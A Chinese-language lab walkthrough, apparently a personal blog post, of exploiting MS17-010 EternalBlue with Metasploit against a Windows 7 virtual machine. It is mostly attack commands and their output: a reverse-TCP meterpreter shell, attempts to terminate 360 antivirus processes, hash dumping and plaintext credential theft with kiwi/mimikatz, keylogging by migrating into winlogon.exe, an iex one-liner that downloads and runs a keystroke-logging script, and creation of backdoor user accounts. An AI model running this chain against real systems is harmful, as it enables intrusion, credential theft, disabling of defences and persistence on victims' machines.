永恒之蓝ms17-010的利用
实验环境:
Kali虚拟机:攻击机
Win7虚拟机:目标机
主要工具:metasploit
##获取meterpreter
- 使用关键字
17-010在metasploit中查找
msf5 > search 17-010Matching Modules
================# Name Disclosure Date Rank Check Description- ---- --------------- ---- ----- -----------1 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution2 auxiliary/scanner/smb/smb_ms17_010 normal Yes MS17-010 SMB RCE Detection3 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption4 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+5 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution- 使用辅助模块auxiliary中的
auxiliary/scanner/smb/smb_ms17_010验证是否存在漏洞
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > show optionsModule options (auxiliary/scanner/smb/smb_ms17_010):Name Current Setting Required Description---- --------------- -------- -----------CHECK_ARCH true no Check for architecture on vulnerable hostsCHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hostsCHECK_PIPE false no Check for named pipe on vulnerable hostsNAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to checkRHOSTS yes The target address range or CIDR identifierRPORT 445 yes The SMB service port (TCP)SMBDomain . no The Windows domain to use for authenticationSMBPass no The password for the specified usernameSMBUser no The username to authenticate asTHREADS 1 yes The number of concurrent threadsmsf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.8.129
rhosts => 192.168.8.129
msf5 auxiliary(scanner/smb/smb_ms17_010) > run[+] 192.168.8.129:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.8.129:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed可以看到"Host is likely VULNERABLE to MS17-010!…",说明漏洞存在。
-
利用漏洞反弹shell,获取meterpreter
360安全卫士会拦截,目标机器不能装360或需关闭360。
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > show optionsModule options (exploit/windows/smb/ms17_010_eternalblue):Name Current Setting Required Description---- --------------- -------- -----------RHOSTS yes The target address range or CIDR identifierRPORT 445 yes The target port (TCP)SMBDomain . no (Optional) The Windows domain to use for authenticationSMBPass no (Optional) The password for the specified usernameSMBUser no (Optional) The username to authenticate asVERIFY_ARCH true yes Check if remote architecture matches exploit Target.VERIFY_TARGET true yes Check if remote OS matches exploit Target.Exploit target:Id Name-- ----0 Windows 7 and Server 2008 R2 (x64) All Service Packsmsf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.8.129
rhosts => 192.168.8.129
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.8.124
lhosts => 192.168.8.124
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit[*] Started reverse TCP handler on 192.168.8.124:4444
[*] 192.168.8.129:445 - Connecting to target for exploitation.
[+] 192.168.8.129:445 - Connection established for exploitation.
[+] 192.168.8.129:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.8.129:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.8.129:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.8.129:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 192.168.8.129:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.8.129:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.8.129:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.8.129:445 - Sending all but last fragment of exploit packet
[*] Sending stage (206403 bytes) to 192.168.8.129
[*] Meterpreter session 1 opened (192.168.8.124:4444 -> 192.168.8.129:49475) at 2019-10-12 03:50:01 -0400
[-] 192.168.8.129:445 - RubySMB::Error::CommunicationError: RubySMB::Error::CommunicationErrormeterpreter > ##确认用户权限
meterpreter > shell
Process 2132 created.
Channel 1 created.
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����C:\Windows\system32>whoami
whoami
nt authority\systemC:\Windows\system32>exit
exit
meterpreter > 可以看到是system权限。
也可以直接在meterpreter中运行getuid查看用户权限:
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > ##提权
如果不是system权限,可以尝试提权:
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 看到"got system via technique…"字样,提权成功。
##关闭杀毒软件
- 自定义字典
在/usr/share/metasploit-framework/data/wordlists/av_hips_executables.txt中自定义字典,添加需要关闭的杀毒软件进程,如zhudongfangyu.exe、360tray.exe,全部小写。
- 关闭杀毒软件
- killav
不要使用run killav
meterpreter > run post/windows/manage/killav [*] Attempting to terminate 'ZhuDongFangYu.exe' (PID: 1064) ...
[-] Failed to terminate 'ZhuDongFangYu.exe' (PID: 1064).
[*] Attempting to terminate '360Tray.exe' (PID: 3408) ...
[-] Failed to terminate '360Tray.exe' (PID: 3408).
[+] A total of 2 process(es) were discovered, 0 were terminated.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 明明是system权限,进程竟然没有被杀掉,郁闷。
- powershell
通过shell命令进入到目标机器,然后执行powershell命令开启powershell交互界面,这个时候输入命令无响应,无法通过这种方式在目标机器执行powershell命令。所以采用下面这种方法。
meterpreter > load
load espia load kiwi load peinjector load sniffer
load extapi load lanattacks load powershell load unhook
load incognito load mimikatz load python load winpmem
meterpreter > load powershell
Loading extension powershell...Success.
meterpreter > help powershellPowershell Commands
===================Command Description------- -----------powershell_execute Execute a Powershell command stringpowershell_import Import a PS1 script or .NET Assembly DLLpowershell_shell Create an interactive Powershell promptmeterpreter > powershell_shell
PS > Get-ProcessHandles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName
------- ------ ----- ----- ----- ------ -- -----------173 20 13964 9544 117 0.23 1732 360leakfixer584 55 99776 105588 317 8.49 3944 360Safe1936 152 164724 20452 577 12.62 3408 360Tray32 5 1088 3100 49 0.02 696 conhost31 5 1084 3108 49 0.05 1448 conhost515 12 2100 4360 83 0.50 364 csrss574 15 10624 10204 178 2.64 468 csrss195 16 4328 6932 57 0.56 1936 dllhost126 14 51340 38100 130 1.05 2592 dwm706 49 28940 46708 247 7.92 2632 explorer64 7 1040 2832 35 0.03 1496 Ext2Srv0 0 0 24 0 0 Idle40 5 940 2392 21 0.00 1552 imdsksvc772 24 4304 8300 45 2.09 572 lsass204 10 2768 5024 33 0.11 580 lsm50 8 996 2952 47 0.03 1584 metsvc148 17 3476 4484 61 0.06 2192 msdtc257 22 51456 55128 558 0.30 1608 powershell271 22 51200 55432 559 0.22 3936 powershell778 55 34844 16556 147 1.06 2076 SearchIndexer228 14 5372 6572 44 2.15 556 services405 31 9896 14852 163 0.94 3712 sesvc30 2 452 776 4 0.12 276 smss306 31 10076 13592 137 0.98 1856 SoftMgrLite648 54 84828 76780 639 0.90 1284 spoolsv508 17 5880 7316 44 1.26 548 svchost361 14 4364 7272 46 2.40 688 svchost268 16 3840 6712 38 0.34 792 svchost472 23 17756 14100 84 3.07 860 svchost427 24 66132 68028 162 13.32 940 svchost1183 52 20824 24108 408 6.65 984 svchost571 35 14256 12320 92 1.93 1144 svchost143 15 2612 13328 51 0.34 1292 svchost257 30 5788 7968 49 0.53 1332 svchost94 8 1648 3592 47 0.02 1916 svchost103 13 1872 5000 34 0.14 1992 svchost314 41 61952 5296 129 0.73 2916 svchost646 0 112 368 3 4 System205 16 7412 8980 83 0.27 2504 taskhost127 12 3640 13272 112 7.52 3440 taskmgr280 23 11824 912 128 1.67 1016 updater87 10 5224 3744 62 0.08 1632 VGAuthService56 6 1436 2748 39 0.00 748 vmacthlp310 25 10320 11500 100 5.88 1688 vmtoolsd244 22 10488 15192 125 6.63 2788 vmtoolsd82 10 1560 3988 57 0.09 456 wininit118 10 2964 5708 66 0.25 520 winlogon230 15 7052 10468 52 1208 WmiPrvSE382 35 10520 10848 105 1.05 1064 ZhuDongFangYuPS > Stop-Process 1064
ERROR: Stop-Process : ??????????????ZhuDongFangYu (1064)?: ?????
ERROR: ???? ?:1 ??: 13
ERROR: + Stop-Process <<<< 1064
ERROR: + CategoryInfo : CloseError: (System.Diagnost...(ZhuDongFangYu):Process) [Stop-Process], ProcessCommandEx
EERROR: + FullyQualifiedErrorId : CouldNotStopProcess,Microsoft.PowerShell.Commands.StopProcessCommand
ERROR:
PS > 现在meterpreter中加载powershell模块,然后执行powershell_shell命令进入交互式powershell界面。通过Get-Process查看到ZhuDongFangYu进程id为1064,然后通过Stop-Process停止进程,还是没有杀掉,持续郁闷。
关闭防火墙
略
##信息收集
###获取目标主机详细信息
- run scraper
获取系统信息、环境变量、网络、服务、用户、域、密码哈希等信息。
meterpreter > run scraper
[*] New session on 192.168.8.129:445...
[*] Gathering basic system information...
[*] Dumping password hashes...
[*] Obtaining the entire registry...
[*] Exporting HKCU
[*] Downloading HKCU (C:\Windows\TEMP\oksMbdKb.reg)
[*] Cleaning HKCU
[*] Exporting HKLM
[*] Downloading HKLM (C:\Windows\TEMP\xZUHpvAU.reg)
[*] Cleaning HKLM
[*] Exporting HKCC
[*] Downloading HKCC (C:\Windows\TEMP\pcrWzade.reg)
[*] Cleaning HKCC
[*] Exporting HKCR
[*] Downloading HKCR (C:\Windows\TEMP\AXZDmEKp.reg)
[*] Cleaning HKCR
[*] Exporting HKU
[*] Downloading HKU (C:\Windows\TEMP\jaOsLEOM.reg)
[*] Cleaning HKU
[*] Completed processing on 192.168.8.129:445...
meterpreter > - run winenum
部分结果和run scraper重复。
meterpreter > run winenum
[*] Running Windows Local Enumeration Meterpreter Script
[*] New session on 192.168.1.8:445...
[*] Saving general report to /root/.msf4/logs/scripts/winenum/PC_20191012.5354/PC_20191012.5354.txt
[*] Output of each individual command is saved to /root/.msf4/logs/scripts/winenum/PC_20191012.5354
[*] Checking if PC is a Virtual Machine ........
[*] This is a VMware Workstation/Fusion Virtual Machine
[*] UAC is Disabled
[*] Running Command List ...
[*] running command arp -a
[*] running command ipconfig /displaydns
[*] running command ipconfig /all
[*] running command route print
[*] running command cmd.exe /c set
[*] running command netstat -ns
[*] running command netstat -nao
[*] running command net accounts
[*] running command netstat -vb
[*] running command net view
[*] running command net localgroup
[*] running command net group administrators
[*] running command net session
[*] running command net share
[*] running command net group
[*] running command net user
[*] running command net view /domain
[*] running command netsh firewall show config
[*] running command net localgroup administrators
[*] running command tasklist /svc
[*] running command netsh wlan show drivers
[*] running command gpresult /SCOPE USER /Z
[*] running command netsh wlan show networks mode=bssid
[*] running command gpresult /SCOPE COMPUTER /Z
[*] running command netsh wlan show profiles
[*] running command netsh wlan show interfaces
[*] Running WMIC Commands ....
[*] running command wmic group list
[*] running command wmic service list brief
[*] running command wmic netlogin get name,lastlogon,badpasswordcount
[*] running command wmic logicaldisk get description,filesystem,name,size
[*] running command wmic useraccount list
[*] running command wmic netuse get name,username,connectiontype,localname
[*] running command wmic nteventlog get path,filename,writeable
[*] running command wmic volume list brief
[*] running command wmic share get name,path
[*] running command wmic netclient list brief
[*] running command wmic qfe
[*] running command wmic startup list full
[*] running command wmic rdtoggle list
[*] running command wmic product get name,version
[*] Extracting software list from registry
[*] Dumping password hashes...
[*] Hashes Dumped
[*] Getting Tokens...
[*] All tokens have been processed
[*] Done!
meterpreter > ###查看目标主机安装了哪些应用
meterpreter > run post/windows/gather/enum_applications [*] Enumerating applications installed on PCInstalled Applications
======================Name Version---- -------Advanced Archive Password Recovery 4.54.110.4540Elcomsoft Forensic Disk Decryptor 1.00.110.1392Ext2Fsd 0.69 0.69Java 8 Update 121 (64-bit) 8.0.1210.13Java Auto Updater 2.8.181.13Java SE Development Kit 8 Update 121 (64-bit) 8.0.1210.13Microsoft .NET Framework 4.7.2 4.7.03062Microsoft .NET Framework 4.7.2 4.7.03062Microsoft .NET Framework 4.7.2 (CHS) 4.7.03062Microsoft .NET Framework 4.7.2 (简体中文) 4.7.03062Microsoft Visual C++ 2005 Redistributable 8.0.61187Microsoft Visual C++ 2005 Redistributable (x64) 8.0.61186Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 9.0.30729.6161Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 9.0.30729.4148Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.7523 9.0.30729.7523Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 10.0.40219Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61135 11.0.61135Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61135 11.0.61135Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61135 11.0.61135Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61135 11.0.61135Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40664 12.0.40664.0Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40664 12.0.40664.0Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.40664 12.0.40664Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.40664 12.0.40664Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.40664 12.0.40664Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.40664 12.0.40664Microsoft Visual C++ 2017 Redistributable (x64) - 14.15.26706 14.15.26706.0Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 14.15.26706.0Microsoft Visual C++ 2017 x64 Additional Runtime - 14.15.26706 14.15.26706Microsoft Visual C++ 2017 x64 Minimum Runtime - 14.15.26706 14.15.26706Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 14.15.26706Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 14.15.26706Python 2.7.13 (64-bit) 2.7.13150Python 3.7.3 Add to Path (64-bit) 3.7.3150.0Python 3.7.3 Core Interpreter (64-bit) 3.7.3150.0Python 3.7.3 Development Libraries (64-bit) 3.7.3150.0Python 3.7.3 Documentation (64-bit) 3.7.3150.0Python 3.7.3 Executables (64-bit) 3.7.3150.0Python 3.7.3 Standard Library (64-bit) 3.7.3150.0Python 3.7.3 Tcl/Tk Support (64-bit) 3.7.3150.0Python 3.7.3 Test Suite (64-bit) 3.7.3150.0Python 3.7.3 Utility Scripts (64-bit) 3.7.3150.0Python 3.7.3 pip Bootstrap (64-bit) 3.7.3150.0Python Launcher 3.7.6657.0SecureCRT V6.2.3.313 汉化版 V6.2.3.313 汉化版SilentEye 0.4.1Stellar Phoenix JPEG Repair 5.0.0.0Stellar Phoenix Photo Recovery Professional 8.0.0.1Update for Microsoft .NET Framework 4.7.2 (KB4087364) 1Update for Microsoft .NET Framework 4.7.2 (KB4457035) 1VMware Tools 10.0.0.2977863WinRAR 5.11 (64-位) 5.11.0Windows Mobile Connectivity Tools 10.0.15254.0 - Desktop x86 10.1.15254.1Windows SDK AddOn 10.1.0.0搜狗输入法 9.1正式版 9.1.0.2657[+] Results stored in: /root/.msf4/loot/20191012053311_default_192.168.8.129_host.application_804807.txt
meterpreter > ###查看目标主机有哪些用户
meterpreter > run post/windows/gather/enum_logged_on_users [*] Running against session 1Current Logged Users
====================SID User--- ----S-1-5-18 NT AUTHORITY\SYSTEMS-1-5-21-1244648496-323992457-611466280-1000 PC\XinSai[+] Results saved in: /root/.msf4/loot/20191012053946_default_192.168.8.129_host.users.activ_091950.txtRecently Logged Users
=====================SID Profile Path--- ------------S-1-5-18 %systemroot%\system32\config\systemprofileS-1-5-19 C:\Windows\ServiceProfiles\LocalServiceS-1-5-20 C:\Windows\ServiceProfiles\NetworkServiceS-1-5-21-1244648496-323992457-611466280-1000 C:\Users\XinSaiS-1-5-21-1244648496-323992457-611466280-501 C:\Users\Guestmeterpreter > ###抓取用户密码哈希
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
XinSai:1000:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::
meterpreter > 格式为用户名:SID:LM哈希:NTLM哈希:::,之后可以使用类似John the Ripper等工具进行破解哈希。
###抓取用户密码明文
meterpreter内置了一些扩展库,可以通过输入load,然后连续按两次TAB键进行查看:
meterpreter > load
load espia load kiwi load peinjector load sniffer
load extapi load lanattacks load powershell load unhook
load incognito load mimikatz load python load winpmem
meterpreter > load - kiwi模块
加载kiwi模块,然后运行creds_all命令。
meterpreter > load kiwi
Loading extension kiwi....#####. mimikatz 2.1.1 20180925 (x64/windows).## ^ ##. "A La Vie, A L'Amour"## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )## \ / ## > http://blog.gentilkiwi.com/mimikatz'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )'#####' > http://pingcastle.com / http://mysmartlogon.com ***/Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============Username Domain LM NTLM SHA1
-------- ------ -- ---- ----
XinSai PC f0d412bd764ffe81aad3b435b51404ee 209c6174da490caeb422f3fa5a7ae634 7c87541fd3f3ef5016e12d411900c87a6046a8e8wdigest credentials
===================Username Domain Password
-------- ------ --------
(null) (null) (null)
PC$ WORKGROUP (null)
XinSai PC admintspkg credentials
=================Username Domain Password
-------- ------ --------
XinSai PC adminkerberos credentials
====================Username Domain Password
-------- ------ --------
(null) (null) (null)
XinSai PC admin
pc$ WORKGROUP (null)meterpreter > 可以看到用户XinSai的密码为"admin"。
- mimikatz模块
加载mimikatz模块,然后运行wdigest:
meterpreter > help mimikatzMimikatz Commands
=================Command Description------- -----------kerberos Attempt to retrieve kerberos creds.livessp Attempt to retrieve livessp creds.mimikatz_command Run a custom command.msv Attempt to retrieve msv creds (hashes).ssp Attempt to retrieve ssp creds.tspkg Attempt to retrieve tspkg creds.wdigest Attempt to retrieve wdigest creds.meterpreter > wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================AuthID Package Domain User Password
------ ------- ------ ---- --------
0;816638 NTLM PC xman666 mod_process::getVeryBasicModulesListForProcess : (0x0000012b) 艑�� ReadProcessMemory WriteProcessMemory 鰾 n.a. (wdigest KO)
0;372325 NTLM PC XinSai mod_process::getVeryBasicModulesListForProcess : (0x0000012b) 艑�� ReadProcessMemory WriteProcessMemory 鰾 n.a. (wdigest KO)
0;997 Negotiate NT AUTHORITY LOCAL SERVICE mod_process::getVeryBasicModulesListForProcess : (0x0000012b) 艑�� ReadProcessMemory WriteProcessMemory 鰾 n.a. (wdigest KO)
0;996 Negotiate WORKGROUP PC$ mod_process::getVeryBasicModulesListForProcess : (0x0000012b) 艑�� ReadProcessMemory WriteProcessMemory 鰾 n.a. (wdigest KO)
0;48926 NTLM mod_process::getVeryBasicModulesListForProcess : (0x0000012b) 艑�� ReadProcessMemory WriteProcessMemory 鰾 n.a. (wdigest KO)
0;999 NTLM WORKGROUP PC$ mod_process::getVeryBasicModulesListForProcess : (0x0000012b) 艑�� ReadProcessMemory WriteProcessMemory 鰾 n.a. (wdigest KO)meterpreter > 然而并没有得到密码,翻车。
###流量嗅探
####键盘记录
- keyscan_dump
Meterpreter还可以在目标设备上实现键盘记录功能,键盘记录主要涉及以下三种命令:
keyscan_start:开启键盘记录功能
keyscan_dump:显示捕捉到的键盘记录信息
keyscan_stop:停止键盘记录功能
不过在使用键盘记录功能时,通常需要跟目标进程进行绑定。下面我们会将Meterpreter跟 winlogon.exe 绑定,并在登录进程中捕获键盘记录,以获得用户的密码。
- 绑定进程
meterpreter > psProcess List
============PID PPID Name Arch Session User Path--- ---- ---- ---- ------- ---- ----0 0 [System Process] 4 0 System x64 0 240 4 smss.exe x64 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe328 320 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe340 908 dwm.exe x64 3 C:\Windows\system32\Dwm.exe384 524 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE 412 320 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\wininit.exe524 412 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\services.exe540 412 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsass.exe548 412 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsm.exe616 524 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE 648 524 svchost.exe x64 0 NT AUTHORITY\SYSTEM 712 524 vmacthlp.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe744 524 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE 816 524 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE 908 524 svchost.exe x64 0 NT AUTHORITY\SYSTEM 960 524 svchost.exe x64 0 NT AUTHORITY\SYSTEM 1032 1176 QwdqufeOMpX.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\TEMP\QwdqufeOMpX.exe1088 4060 LogonUI.exe x64 4 NT AUTHORITY\SYSTEM C:\Windows\system32\LogonUI.exe1112 1176 sQoycPhez.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\TEMP\sQoycPhez.exe1176 524 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe1212 524 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE 1268 524 msdtc.exe x64 0 NT AUTHORITY\NETWORK SERVICE 1320 524 Ext2Srv.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Ext2Fsd\Ext2Srv.exe1364 524 imdsksvc.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\imdsksvc.exe1412 524 VGAuthService.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe1456 524 vmtoolsd.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe1584 524 taskhost.exe x64 3 C:\Windows\system32\taskhost.exe1732 524 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE 1796 524 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE 1956 524 dllhost.exe x64 0 NT AUTHORITY\SYSTEM 1996 648 WmiPrvSE.exe 2284 1088 csrss.exe x64 3 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe2408 2732 SearchFilterHost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\SearchFilterHost.exe2496 2272 explorer.exe x64 3 C:\Windows\Explorer.EXE2596 524 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE 2668 524 svchost.exe x64 0 NT AUTHORITY\SYSTEM 2732 524 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM 2828 1176 xmutGkHXf.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\TEMP\xmutGkHXf.exe2840 1176 TeyQCXoY.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\TEMP\TeyQCXoY.exe3020 1176 plKeHIXhzUQQ.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\TEMP\plKeHIXhzUQQ.exe3220 1176 maBudFEovnC.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\TEMP\maBudFEovnC.exe3384 1176 wLBliAR.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\TEMP\wLBliAR.exe3456 2912 csrss.exe x64 4 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe3748 816 audiodg.exe x64 0 3784 2732 SearchProtocolHost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\SearchProtocolHost.exe3944 2496 vmtoolsd.exe x64 3 C:\Program Files\VMware\VMware Tools\vmtoolsd.exe4024 1176 dtUmbNlfMa.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\TEMP\dtUmbNlfMa.exe4060 2912 winlogon.exe x64 4 NT AUTHORITY\SYSTEM C:\Windows\system32\winlogon.exemeterpreter > getpid
Current pid: 1176
meterpreter > 可以看到winlogon.exe的pid为4060,且当前meterpreter的pid为1176。下面进行进程绑定。
meterpreter > migrate 4060
[*] Migrating from 1176 to 4060...
[*] Migration completed successfully.
meterpreter > getpid
Current pid: 4060
meterpreter > 绑定成功,且meterpreter的pid已迁移到目标进程。
- 键盘监听
meterpreter > keyscan_start
Starting the keystroke sniffer ...
meterpreter > 此时在受害者机密登录界面,输入密码进行登录。然后:
meterpreter > keyscan_dump
Dumping captured keystrokes...
admin<CR>meterpreter > keyscan_stop
Stopping the keystroke sniffer...
meterpreter > 成功捕获了受害者的输入"admin“,密码即"admin”,最后是回车。
- keylogrecorder
meterpreter > run keylogrecorder -h[!] Meterpreter scripts are deprecated. Try post/windows/capture/keylog_recorder.
[!] Example: run post/windows/capture/keylog_recorder OPTION=value [...]
Keylogger Recorder Meterpreter Script
This script will start the Meterpreter Keylogger and save all keys
in a log file for later anlysis. To stop capture hit Ctrl-C
Usage:
OPTIONS:-c <opt> Type of key capture. (0) for user key presses, (1) for winlogon credential capture, or (2) for no migration. Default is 2.-h Help menu.-k Kill old Process-l Lock screen when capturing Winlogon credentials.-t <opt> Time interval in seconds between recollection of keystrokes, default 30 seconds.meterpreter > run keylogrecorder -c 0[!] Meterpreter scripts are deprecated. Try post/windows/capture/keylog_recorder.
[!] Example: run post/windows/capture/keylog_recorder OPTION=value [...]
[*] explorer.exe Process found, migrating into 2764
[*] Migration Successful!!
[*] explorer.exe Process found, migrating into 928
meterpreter > run keylogrecorder -c 0[!] Meterpreter scripts are deprecated. Try post/windows/capture/keylog_recorder.
[!] Example: run post/windows/capture/keylog_recorder OPTION=value [...]
meterpreter > 结果并没有捕获到键盘输入,翻车。
- Get-Keystrokes
下载powershell脚本:https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1,上传到目标主机,然后执行:
PS D:\> Import-Module .\Get-Keystrokes.ps1
PS D:\> Get-Keystrokes -LogPath c:\windows\temp\key.log
PS D:\>
所有的按键都会被记录到key.log中。
也可以执行如下命令:
PS D:\> iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Exfiltration/Get-Keystrokes.ps1’); Get-Keystrokes –Logpath c:\windows\temp\key.log##添加新用户
- run getgui
meterpreter > run getgui -u xman666 -p admin[!] Meterpreter scripts are deprecated. Try post/windows/manage/enable_rdp.
[!] Example: run post/windows/manage/enable_rdp OPTION=value [...]
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Setting user account for logon
[*] Adding User: xman666 with Password: admin
[-] Account could not be created
[-] Error:
[-] 命令成功完成。
[*] For cleanup use command: run multi_console_command -r /root/.msf4/logs/scripts/getgui/clean_up__20191012.2058.rc
meterpreter > shell
Process 4020 created.
Channel 54 created.
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。C:\Windows\system32>net user xman666
net user xman666
用户名 xman666
全名
注释
用户的注释
国家/地区代码 000 (系统默认值)
帐户启用 Yes
帐户到期 从不上次设置密码 2019/10/13 11:20:58
密码到期 2019/11/24 11:20:58
密码可更改 2019/10/13 11:20:58
需要密码 Yes
用户可以更改密码 Yes允许的工作站 All
登录脚本
用户配置文件
主目录
上次登录 从不可允许的登录小时数 All本地组成员 *Users
全局组成员 *None
命令成功完成。C:\Windows\system32>可以看到,这里用户创建成功了,但添加到Administrators组失败了。
- 命令行
meterpreter > shell
Process 2816 created.
Channel 52 created.
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。C:\Windows\system32>whoami
whoami
nt authority\systemC:\Windows\system32>net user
net user\\ 的用户帐户-------------------------------------------------------------------------------
Administrator Guest XinSai
xman666
命令运行完毕,但发生一个或多个错误。C:\Windows\system32>net user test test /add
net user test test /add
命令成功完成。C:\Windows\system32>net user
net user\\ 的用户帐户-------------------------------------------------------------------------------
Administrator Guest test
XinSai xman666
命令运行完毕,但发生一个或多个错误。可以看到添加了一个用户test,密码为test。查看用户信息:
C:\Windows\system32>net user test
net user test
用户名 test
全名
注释
用户的注释
国家/地区代码 000 (系统默认值)
帐户启用 Yes
帐户到期 从不上次设置密码 2019/10/13 11:11:32
密码到期 2019/11/24 11:11:32
密码可更改 2019/10/13 11:11:32
需要密码 Yes
用户可以更改密码 Yes允许的工作站 All
登录脚本
用户配置文件
主目录
上次登录 2019/10/13 11:12:03可允许的登录小时数 All本地组成员 *Users
全局组成员 *None
命令成功完成。C:\Windows\system32>可以看到用户属于Users组,非管理员用户,下面添加到管理员组。
